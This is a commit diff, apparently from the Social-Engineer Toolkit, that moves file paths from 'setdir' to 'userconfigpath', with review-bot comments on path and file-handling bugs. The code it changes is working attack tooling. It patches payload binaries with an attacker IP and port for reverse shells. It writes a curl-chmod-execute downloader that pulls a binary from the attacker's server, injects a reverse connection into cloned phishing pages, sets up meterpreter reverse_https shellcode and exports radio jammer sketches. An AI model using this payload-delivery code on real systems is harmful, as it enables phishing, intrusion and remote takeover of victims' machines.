if not os.path.isdir(userconfigpath + "web_clone/"):
|
||||
os.makedirs(userconfigpath + "web_clone/")
|
||||
|
||||
# grab ip address and SET web server interface
|
||||
if os.path.isfile(setdir + "/interface"):
|
||||
fileopen = open(setdir + "interface", "r")
|
||||
if os.path.isfile(userconfigpath + "interface"):
|
||||
fileopen = open(userconfigpath + "interface", "r")
|
||||
for line in fileopen:
|
||||
ipaddr = line.rstrip()
|
||||
|
||||
|
@ -94,8 +94,8 @@ webserver = exe_name + " " + webserver
|
|||
|
||||
# this is generated through payloadgen.py and lets SET know if its a RATTE
|
||||
# payload or SET payload
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
fileopen = open(setdir + "/set.payload", "r")
|
||||
if os.path.isfile(userconfigpath + "set.payload"):
|
||||
fileopen = open(userconfigpath + "set.payload", "r")
|
||||
for line in fileopen:
|
||||
payload_selection = line.rstrip()
|
||||
else:
|
||||
|
@ -105,7 +105,7 @@ else:
|
|||
# determine if we want to target osx/nix as well
|
||||
posix = False
|
||||
# find if we selected it
|
||||
if os.path.isfile(setdir + "/set.payload.posix"):
|
||||
if os.path.isfile(userconfigpath + "set.payload.posix"):
|
||||
# if we have then claim true
|
||||
posix = True
|
||||
|
||||
|
@ -114,20 +114,20 @@ if payload_selection == "SETSHELL":
|
|||
# replace ipaddress with one that we need for reverse connection back
|
||||
fileopen = open("src/payloads/set_payloads/downloader.windows", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
host = int(len(exe_name) + 1) * "X"
|
||||
webserver_count = int(len(webserver) + 1) * "S"
|
||||
ipaddr_count = int(len(ipaddr) + 1) * "M"
|
||||
filewrite.write(data.replace(str(host), exe_name + "\x00", 1))
|
||||
filewrite.close()
|
||||
fileopen = open(setdir + "/msf.exe", "rb")
|
||||
fileopen = open(userconfigpath + "msf.exe", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1))
|
||||
filewrite.close()
|
||||
fileopen = open(setdir + "/msf.exe", "rb")
|
||||
fileopen = open(userconfigpath + "msf.exe", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1))
|
||||
filewrite.close()
|
||||
|
||||
|
@ -135,14 +135,14 @@ if payload_selection == "SETSHELL":
|
|||
if payload_selection == "RATTE":
|
||||
fileopen = open("src/payloads/ratte/ratte.binary", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
host = int(len(ipaddr) + 1) * "X"
|
||||
rPort = int(len(str(port)) + 1) * "Y"
|
||||
filewrite.write(data.replace(str(host), ipaddr + "\x00", 1))
|
||||
filewrite.close()
|
||||
fileopen = open(setdir + "/msf.exe", "rb")
|
||||
fileopen = open(userconfigpath + "msf.exe", "rb")
|
||||
data = fileopen.read()
|
||||
filewrite = open(setdir + "/msf.exe", "wb")
|
||||
filewrite = open(userconfigpath + "msf.exe", "wb")
|
||||
filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1))
|
||||
filewrite.close()
|
||||
|
||||
|
@ -152,22 +152,22 @@ if upx_encode == "ON" or upx_encode == "on":
|
|||
# core upx
|
||||
pass
|
||||
|
||||
if os.path.isfile(setdir + "/web_clone/msf.exe"):
|
||||
os.remove(setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
|
||||
os.remove(userconfigpath + "web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe")
|
||||
|
||||
if payload_selection == "SETSHELL":
|
||||
if os.path.isfile(setdir + "/web_clone/x"):
|
||||
os.remove(setdir + "/web_clone/x")
|
||||
if os.path.isfile(userconfigpath + "web_clone/x"):
|
||||
os.remove(userconfigpath + "web_clone/x")
|
||||
shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" %
|
||||
(definepath), setdir + "/web_clone/x")
|
||||
(definepath), userconfigpath + "web_clone/x")
|
||||
|
||||
# if we are targetting nix
|
||||
if posix == True:
|
||||
print_info(
|
||||
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...")
|
||||
filewrite = open(setdir + "/web_clone/mac.bin", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/mac.bin", "w")
|
||||
payload_flags = webserver.split(" ")
|
||||
# grab osx binary name
|
||||
osx_name = generate_random_string(10, 10)
|
||||
|
@ -255,21 +255,21 @@ if posix == True:
|
|||
linux_name = generate_random_string(10, 10)
|
||||
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
|
||||
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2])
|
||||
filewrite = open(setdir + "/web_clone/nix.bin", "w")
|
||||
filewrite = open(userconfigpath + "web_clone/nix.bin", "w")
|
||||
filewrite.write(downloader)
|
||||
filewrite.close()
|
||||
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx",
|
||||
setdir + "/web_clone/%s" % (osx_name))
|
||||
userconfigpath + "web_clone/%s" % (osx_name))
|
||||
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux",
|
||||
setdir + "/web_clone/%s" % (linux_name))
|
||||
userconfigpath + "web_clone/%s" % (linux_name))
|
||||
|
||||
# copy over the downloader scripts
|
||||
osx_down = check_options("MAC.BIN=")
|
||||
lin_down = check_options("NIX.BIN=")
|
||||
shutil.copyfile(setdir + "/web_clone/nix.bin",
|
||||
setdir + "/web_clone/%s" % (lin_down))
|
||||
shutil.copyfile(setdir + "/web_clone/mac.bin",
|
||||
setdir + "/web_clone/%s" % (osx_down))
|
||||
shutil.copyfile(userconfigpath + "web_clone/nix.bin",
|
||||
userconfigpath + "web_clone/%s" % (lin_down))
|
||||
shutil.copyfile(userconfigpath + "web_clone/mac.bin",
|
||||
userconfigpath + "web_clone/%s" % (osx_down))
|
||||
|
||||
# check to see if we are using a staged approach or direct shell
|
||||
stager = check_config("SET_SHELL_STAGER=").lower()
|
||||
|
@ -277,11 +277,11 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
|
|||
# only trigger if we are using the SETSHELL
|
||||
if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP":
|
||||
# ensure that index.html is really there
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
print_status(
|
||||
"Stager turned off, prepping direct download payload...")
|
||||
fileopen = open(setdir + "/web_clone/index.html", "r")
|
||||
filewrite = open(setdir + "/web_clone/index.html.3", "w")
|
||||
fileopen = open(userconfigpath + "web_clone/index.html", "r")
|
||||
filewrite = open(userconfigpath + "web_clone/index.html.3", "w")
|
||||
data = fileopen.read()
|
||||
# replace freehugs with ip and port
|
||||
data = data.replace("freehugs", reverse_connection)
|
||||
|
@ -293,22 +293,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
|
|||
# be newer
|
||||
if payload_selection == "SETSHELL":
|
||||
try:
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.html.3",
|
||||
setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.3"):
|
||||
os.remove(setdir + "/web_clone/index.html.3")
|
||||
if os.path.isfile(setdir + "/web_clone/msf.exe"):
|
||||
os.remove(setdir + "/web_clone/msf.exe")
|
||||
shutil.copyfile(setdir + "/web_clone/x",
|
||||
setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
|
||||
os.remove(userconfigpath + "web_clone/index.html.3")
|
||||
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
|
||||
os.remove(userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(userconfigpath + "web_clone/x",
|
||||
userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
os.remove(setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
os.remove(userconfigpath + "msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
|
||||
# catch errors, will convert to log later
|
||||
except Exception as error:
|
||||
|
@ -317,22 +317,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
|
|||
# if we are using the HTTP reverse shell then lets use this
|
||||
if payload_selection == "SETSHELL_HTTP":
|
||||
try:
|
||||
if os.path.isfile(setdir + "/web_clone/index.html"):
|
||||
os.remove(setdir + "/web_clone/index.html")
|
||||
shutil.copyfile(setdir + "/web_clone/index.html.3",
|
||||
setdir + "/web_clone/index.html")
|
||||
if os.path.isfile(setdir + "/web_clone/index.html.3"):
|
||||
os.remove(setdir + "/web_clone/index.html.3")
|
||||
if os.path.isfile(setdir + "/web_clone/msf.exe"):
|
||||
os.remove(setdir + "/web_clone/msf.exe")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html"):
|
||||
os.remove(userconfigpath + "web_clone/index.html")
|
||||
shutil.copyfile(userconfigpath + "web_clone/index.html.3",
|
||||
userconfigpath + "web_clone/index.html")
|
||||
if os.path.isfile(userconfigpath + "web_clone/index.html.3"):
|
||||
os.remove(userconfigpath + "web_clone/index.html.3")
|
||||
if os.path.isfile(userconfigpath + "web_clone/msf.exe"):
|
||||
os.remove(userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(
|
||||
"src/payloads/set_payloads/http_shell.binary", setdir + "/web_clone/msf.exe")
|
||||
"src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
os.remove(setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
os.remove(userconfigpath + "msf.exe")
|
||||
shutil.copyfile(
|
||||
setdir + "/web_clone/msf.exe", setdir + "/msf.exe")
|
||||
userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe")
|
||||
|
||||
# catch errors, will convert to log later
|
||||
except Exception as error:
|
||||
|
|
|
@ -205,7 +205,7 @@ try:
|
|||
|
||||
try:
|
||||
# write our attack vector to file to be called later
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
filewrite = open(userconfigpath + "attack_vector", "w")
|
||||
|
||||
# webjacking and web templates are not allowed
|
||||
if attack_vector == "5" and choice3 == "1":
|
||||
|
@ -329,7 +329,7 @@ try:
|
|||
["2"], "IP address to SET web server (this could be your external IP or hostname)"))
|
||||
|
||||
filewrite2 = open(
|
||||
setdir + "/interface", "w")
|
||||
userconfigpath + "interface", "w")
|
||||
filewrite2.write(
|
||||
ipquestion)
|
||||
filewrite2.close()
|
||||
|
@ -407,8 +407,8 @@ try:
|
|||
sys.path.append(definepath + "/src/html/")
|
||||
|
||||
# clean up stale file
|
||||
if os.path.isfile(setdir + "/cloner.failed"):
|
||||
os.remove(setdir + "/cloner.failed")
|
||||
if os.path.isfile(userconfigpath + "cloner.failed"):
|
||||
os.remove(userconfigpath + "cloner.failed")
|
||||
|
||||
site_cloned = True
|
||||
|
||||
|
@ -429,7 +429,7 @@ try:
|
|||
except:
|
||||
import src.core.payloadgen.create_payloads
|
||||
|
||||
if os.path.isfile(setdir + "/cloner.failed"):
|
||||
if os.path.isfile(userconfigpath + "cloner.failed"):
|
||||
site_cloned = False
|
||||
|
||||
if site_cloned == True:
|
||||
|
@ -506,9 +506,9 @@ try:
|
|||
definepath = os.getcwd()
|
||||
sys.path.append(
|
||||
definepath + "/src/webattack/web_clone/")
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
os.remove(setdir + "/site.template")
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
os.remove(userconfigpath + "site.template")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("TEMPLATE=CUSTOM")
|
||||
print_info("SET supports both HTTP and HTTPS")
|
||||
# specify the site to clone
|
||||
|
@ -574,7 +574,7 @@ try:
|
|||
except:
|
||||
import src.webattack.web_clone.cloner
|
||||
|
||||
if os.path.isfile(setdir + "/cloner.failed"):
|
||||
if os.path.isfile(userconfigpath + "cloner.failed"):
|
||||
site_cloned = False
|
||||
|
||||
if site_cloned == True:
|
||||
|
@ -652,13 +652,13 @@ try:
|
|||
|
||||
sys.path.append(
|
||||
definepath + "/src/webattack/web_clone/")
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
os.remove(setdir + "/site.template")
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
os.remove(userconfigpath + "site.template")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("TEMPLATE=SELF")
|
||||
# specify the site to clone
|
||||
if not os.path.isdir(setdir + "/web_clone"):
|
||||
os.makedirs(setdir + "/web_clone")
|
||||
if not os.path.isdir(userconfigpath + "web_clone"):
|
||||
os.makedirs(userconfigpath + "web_clone")
|
||||
print_warning(
|
||||
"Example: /home/website/ (make sure you end with /)")
|
||||
print_warning(
|
||||
|
@ -671,11 +671,11 @@ try:
|
|||
if not os.path.isfile(URL + "index.html"):
|
||||
if os.path.isfile(URL):
|
||||
shutil.copyfile(
|
||||
"%s" % (URL), setdir + "/web_clone/index.html")
|
||||
"%s" % (URL), userconfigpath + "web_clone/index.html")
|
||||
if not os.path.isfile(URL):
|
||||
if URL.endswith("index.html"):
|
||||
shutil.copyfile(
|
||||
URL, "%s/web_clone/index.html" % (setdir))
|
||||
URL, "%s/web_clone/index.html" % (userconfigpath))
|
||||
else:
|
||||
print_error("ERROR:index.html not found!!")
|
||||
print_error(
|
||||
|
@ -690,11 +690,11 @@ try:
|
|||
choice = raw_input(
|
||||
"\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ")
|
||||
if choice == "1" or choice == "":
|
||||
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
|
||||
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
|
||||
os.remove(
|
||||
"%s/web_clone/index.html" % (setdir))
|
||||
"%s/web_clone/index.html" % (userconfigpath))
|
||||
shutil.copyfile(
|
||||
URL + "index.html", "%s/web_clone/" % (setdir))
|
||||
URL + "index.html", "%s/web_clone/" % (userconfigpath))
|
||||
if choice == "2":
|
||||
if os.path.isdir(URL + "src/webattack"):
|
||||
print_error(
|
||||
|
@ -705,7 +705,7 @@ try:
|
|||
print_error(
|
||||
"You tried the same thing. Exiting now.")
|
||||
sys.exit()
|
||||
copyfolder(URL, "%s/web_clone/" % setdir)
|
||||
copyfolder(URL, "%s/web_clone/" % userconfigpath)
|
||||
|
||||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
|
@ -782,7 +782,7 @@ try:
|
|||
if not match:
|
||||
if not match1:
|
||||
URL = ("http://" + URL)
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
|
||||
|
@ -807,7 +807,7 @@ try:
|
|||
if not match:
|
||||
if not match1:
|
||||
URL = ("http://" + URL)
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("\nURL=%s" % (URL))
|
||||
filewrite.close()
|
||||
# start tabnabbing here
|
||||
|
@ -879,13 +879,13 @@ try:
|
|||
setprompt(["3"], "IP address for the reverse connection (payload)"))
|
||||
update_options("IPADDR=" + ipaddr)
|
||||
|
||||
filewrite1 = open(setdir + "/payloadgen", "w")
|
||||
filewrite1 = open(userconfigpath + "payloadgen", "w")
|
||||
filewrite1.write("payloadgen=solo")
|
||||
filewrite1.close()
|
||||
|
||||
# if choice is file-format
|
||||
if infectious_menu_choice == "1":
|
||||
filewrite = open(setdir + "/fileformat.file", "w")
|
||||
filewrite = open(userconfigpath + "fileformat.file", "w")
|
||||
filewrite.write("fileformat=on")
|
||||
filewrite.close()
|
||||
sys.path.append(definepath + "/src/core/msf_attacks/")
|
||||
|
@ -923,8 +923,8 @@ try:
|
|||
# try: import src.core.payloadgen.solo
|
||||
# except: module_reload(src.core.payloadgen.solo)
|
||||
# if the set payload is there
|
||||
if os.path.isfile(setdir + "/msf.exe"):
|
||||
shutil.copyfile(setdir + "/msf.exe", "payload.exe")
|
||||
if os.path.isfile(userconfigpath + "msf.exe"):
|
||||
shutil.copyfile(userconfigpath + "msf.exe", "payload.exe")
|
||||
return_continue()
|
||||
|
||||
# Main Menu choice 5: Mass Mailer Attack
|
||||
|
@ -953,7 +953,7 @@ try:
|
|||
|
||||
if teensy_menu_choice != "99":
|
||||
# set our teensy info file in program junk
|
||||
filewrite = open(setdir + "/teensy", "w")
|
||||
filewrite = open(userconfigpath + "teensy", "w")
|
||||
filewrite.write(teensy_menu_choice + "\n")
|
||||
if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14":
|
||||
yes_or_no = yesno_prompt(
|
||||
|
@ -972,10 +972,10 @@ try:
|
|||
if yes_or_no == "NO":
|
||||
filewrite.close()
|
||||
# need these default files for web server load
|
||||
filewrite = open(setdir + "/site.template", "w")
|
||||
filewrite = open(userconfigpath + "site.template", "w")
|
||||
filewrite.write("TEMPLATE=CUSTOM")
|
||||
filewrite.close()
|
||||
filewrite = open(setdir + "/attack_vector", "w")
|
||||
filewrite = open(userconfigpath + "attack_vector", "w")
|
||||
filewrite.write("hid")
|
||||
filewrite.close()
|
||||
# if we are doing binary2teensy
|
||||
|
@ -998,10 +998,10 @@ try:
|
|||
if teensy_menu_choice == "9":
|
||||
print_status(
|
||||
"Generating the SD2Teensy OSX ino file for you...")
|
||||
if not os.path.isdir(setdir + "/reports/osx_sd2teensy"):
|
||||
os.makedirs(setdir + "/reports/osx_sd2teensy")
|
||||
if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"):
|
||||
os.makedirs(userconfigpath + "reports/osx_sd2teensy")
|
||||
shutil.copyfile("src/teensy/osx_sd2teensy.ino",
|
||||
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (setdir))
|
||||
"%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath))
|
||||
print_status(
|
||||
"File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino")
|
||||
return_continue()
|
||||
|
@ -1010,12 +1010,12 @@ try:
|
|||
if teensy_menu_choice == "10":
|
||||
print_status(
|
||||
"Generating the Arduino sniffer and libraries ino..")
|
||||
if not os.path.isdir(setdir + "/reports/arduino_sniffer"):
|
||||
os.makedirs(setdir + "/reports/arduino_sniffer")
|
||||
if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"):
|
||||
os.makedirs(userconfigpath + "reports/arduino_sniffer")
|
||||
shutil.copyfile("src/teensy/x10/x10_sniffer.ino",
|
||||
setdir + "/reports/arduino_sniffer/x10_sniffer.ino")
|
||||
userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino")
|
||||
shutil.copyfile("src/teensy/x10/libraries.zip",
|
||||
setdir + "/reports/arduino_sniffer/libraries.zip")
|
||||
userconfigpath + "reports/arduino_sniffer/libraries.zip")
|
||||
print_status(
|
||||
"Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer")
|
||||
return_continue()
|
||||
|
@ -1024,12 +1024,12 @@ try:
|
|||
if teensy_menu_choice == "11":
|
||||
print_status(
|
||||
"Generating the Arduino jammer ino and libraries...")
|
||||
if not os.path.isdir(setdir + "/reports/arduino_jammer"):
|
||||
os.makedirs(setdir + "/reports/arduino_jammer")
|
||||
if not os.path.isdir(userconfigpath + "reports/arduino_jammer"):
|
||||
os.makedirs(userconfigpath + "reports/arduino_jammer")
|
||||
shutil.copyfile("src/teensy/x10/x10_blackout.ino",
|
||||
setdir + "/reports/arduino_jammer/x10_blackout.ino")
|
||||
userconfigpath + "reports/arduino_jammer/x10_blackout.ino")
|
||||
shutil.copyfile("src/teensy/x10/libraries.zip",
|
||||
setdir + "/reports/arduino_jammer/libraries.zip")
|
||||
userconfigpath + "reports/arduino_jammer/libraries.zip")
|
||||
print_status(
|
||||
"Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer")
|
||||
return_continue()
|
||||
|
@ -1164,8 +1164,8 @@ and send the QRCode via a mailer.
|
|||
"Enter the URL you want the QRCode to go to (99 to exit): ")
|
||||
if url != "99":
|
||||
# if the reports directory does not exist then create it
|
||||
if not os.path.isdir("%s/reports" % (setdir)):
|
||||
os.makedirs("%s/reports" % (setdir))
|
||||
if not os.path.isdir("%s/reports" % (userconfigpath)):
|
||||
os.makedirs("%s/reports" % (userconfigpath))
|
||||
gen_qrcode(url)
|
||||
return_continue()
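Review bot: In the `choice == "1"` branch, `shutil.copyfile(URL + "index.html", "%s/web_clone/" % (userconfigpath))` passes a directory as the destination, but `shutil.copyfile` needs a complete file name there, so the call raises instead of copying. `shutil.copyfile(URL + "index.html", userconfigpath + "web_clone/index.html")` would match the other calls in this section. The section also mixes `userconfigpath + "web_clone/..."`, which is only correct if `userconfigpath` ends in a separator, with `"%s/web_clone/..." % (userconfigpath)`, which adds its own; the definition of `userconfigpath` is not visible here, so neither form can be confirmed. `os.path.join(userconfigpath, "web_clone", "index.html")` is correct either way and is what the commit title announces; the same mix appears in the other file sections of this commit.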
|
||||
|
||||
|
|
|
@ -2025,7 +2025,7 @@ def input(string):
|
|||
|
||||
|
||||
def fetch_template():
|
||||
fileopen = open(setdir + "/site.template").readlines()
|
||||
fileopen = open(userconfigpath + "site.template").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("URL=", line)
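Review bot: `open(userconfigpath + "site.template").readlines()` at the top of `fetch_template` never closes the file handle, and it has no `os.path.isfile` check in front of it, unlike the other readers of `site.template` in this commit. Wrapping the loop in `with open(os.path.join(userconfigpath, "site.template")) as fileopen:` and iterating `for line in fileopen:` closes the handle and drops the extra `readlines()` copy. The rest of the function is outside the hunk, so whether a missing file is handled by a caller cannot be seen from here.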
|
||||
|
|
|
@ -8,7 +8,7 @@ from src.core.setcore import *
|
|||
import subprocess
|
||||
import os
|
||||
definepath = os.getcwd()
|
||||
os.chdir(setdir)
|
||||
os.chdir(userconfigpath)
|
||||
# create the directories for us
|
||||
subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait()
|
||||
# move into CA directory
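Review bot: The `mkdir CA;cd CA;mkdir newcerts private` call right after `os.chdir(userconfigpath)` runs a fixed command through `shell=True` and discards the exit status from `.wait()`, so a failed `mkdir` goes unnoticed. It also creates `private` with whatever the process umask allows. Replacing it with `os.makedirs(os.path.join("CA", "newcerts"))` and `os.makedirs(os.path.join("CA", "private"), 0o700)` avoids the shell and restricts the directory, which matters if `private` holds the CA key as its name suggests. The script continues outside the hunk, so this should be checked against how the directories are used later.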
|
||||
|
|
|
@ -240,7 +240,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
|
|||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
#with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite:
|
||||
#with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
|
||||
# format needed for shellcode generation
|
||||
filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")
|
||||
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
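Review bot: The corrected `os.path.join(core.userconfigpath, "payload_options.shellcode")` line is still commented out, while the live line below it is `filewrite = file(core.userconfigpath + "payload_options.shellcode", "w")`. `file()` exists only in Python 2, and the concatenation depends on `userconfigpath` ending in a separator. Enabling the fixed line as `with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:` and indenting the `filewrite.write(...)` call under it removes both problems and closes the handle. `deploy_hex2binary` continues outside the hunk, so any later `filewrite.close()` would have to be dropped along with it.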
|
||||
|
|
|
@ -68,7 +68,7 @@ try:
|
|||
if port == "":
|
||||
port = "443"
|
||||
core.update_options("PORT={0}".format(port))
|
||||
with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite:
|
||||
with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite:
|
||||
# format needed for shellcode generation
|
||||
filewrite.write("{0} {1},".format(payload, port))
|
||||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
|
|
|
@ -29,8 +29,8 @@ if check_options("CUSTOM_EXE="):
|
|||
custom = 1
|
||||
if not "CMD/MULTI" in check_options("CUSTOM_EXE="):
|
||||
# here we need to modify the java applet to recognize custom attribute
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (setdir), "w")
|
||||
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
|
||||
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
|
||||
data = fileopen3.read()
|
||||
|
||||
# we randomize param name so static sigs cant be used
|
||||
|
@ -39,7 +39,7 @@ if check_options("CUSTOM_EXE="):
|
|||
'param name="8" value="%s"' % (goat_random))
|
||||
filewrite.write(data)
|
||||
filewrite.close()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), shell=True).wait()
|
||||
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait()
|
||||
|
||||
print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
|
||||
print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
|
||||
|
@ -68,8 +68,8 @@ msf_path = ""
|
|||
|
||||
# see if we are using setshell
|
||||
set_payload = ""
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
fileopen = open(setdir + "/set.payload", "r")
|
||||
if os.path.isfile(userconfigpath + "set.payload"):
|
||||
fileopen = open(userconfigpath + "set.payload", "r")
|
||||
for line in fileopen:
|
||||
set_payload = line.rstrip()
|
||||
|
||||
|
@ -97,8 +97,8 @@ def web_server_start():
|
|||
web_port = check_config("WEB_PORT=")
|
||||
|
||||
# see if exploit requires webdav
|
||||
if os.path.isfile(setdir + "/meta_config"):
|
||||
fileopen = open(setdir + "/meta_config", "r")
|
||||
if os.path.isfile(userconfigpath + "meta_config"):
|
||||
fileopen = open(userconfigpath + "meta_config", "r")
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("set SRVPORT 80", line)
|
||||
|
@ -114,8 +114,8 @@ def web_server_start():
|
|||
ipaddr = input("Enter your ipaddress: ")
|
||||
|
||||
# Grab custom or set defined
|
||||
if os.path.isfile(setdir + "/site.template"):
|
||||
fileopen = open(setdir + "/site.template", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "site.template"):
|
||||
fileopen = open(userconfigpath + "site.template", "r").readlines()
|
||||
for line in fileopen:
|
||||
line = line.rstrip()
|
||||
match = re.search("TEMPLATE=", line)
|
||||
|
@ -124,13 +124,13 @@ def web_server_start():
|
|||
template = line[1]
|
||||
|
||||
# grab web attack selection
|
||||
if os.path.isfile(setdir + "/attack_vector"):
|
||||
fileopen = open(setdir + "/attack_vector", "r").readlines()
|
||||
if os.path.isfile(userconfigpath + "attack_vector"):
|
||||
fileopen = open(userconfigpath + "attack_vector", "r").readlines()
|
||||
for line in fileopen:
|
||||
attack_vector = line.rstrip()
|
||||
|
||||
# if it doesn't exist just set a default template
|
||||
if not os.path.isfile(setdir + "/attack_vector"):
|
||||
if not os.path.isfile(userconfigpath + "attack_vector"):
|
||||
attack_vector = "nada"
|
||||
|
||||
# Sticking it to A/V below
|
||||
|
@ -145,14 +145,14 @@ def web_server_start():
|
|||
|
||||
# check multiattack flags here
|
||||
multiattack_harv = "off"
|
||||
if os.path.isfile(setdir + "/multi_harvester"):
|
||||
if os.path.isfile(userconfigpath + "multi_harvester"):
|
||||
multiattack_harv = "on"
|
||||
if os.path.isfile(setdir + "/multi_tabnabbing"):
|
||||
